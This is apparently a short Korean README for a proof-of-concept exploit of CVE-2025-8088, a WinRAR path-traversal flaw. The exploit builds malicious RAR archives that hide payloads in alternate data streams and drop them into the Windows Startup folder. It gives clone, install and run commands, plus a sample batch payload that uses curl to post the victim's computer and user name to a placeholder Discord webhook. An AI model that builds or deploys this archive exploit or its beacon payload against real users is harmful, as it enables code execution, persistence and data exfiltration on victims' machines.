
Winrar CVE 취약점 공격 (7.13 이전) - 단일 파일에서 다중 ADS 스트림 사용 (사용자 정의 PDF 구현)
CVE-2025-8088 WinRAR 취약점(버전 7.12 이하)에 대한 개념 증명 익스플로잇입니다. 이 도구는 경로 탐색을 통해 페이로드를 대체 데이터 스트림(ADS)에 임베드하는 악성 RAR 아카이브를 생성하여 잠재적으로 임의 코드 실행을 유발합니다.
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
스크립트의 PAYLOAD 변수를 교체하세요:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
YOUR_DISCORD_WEBHOOK_URL을 실제 웹훅 URL로 바꾸세요.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\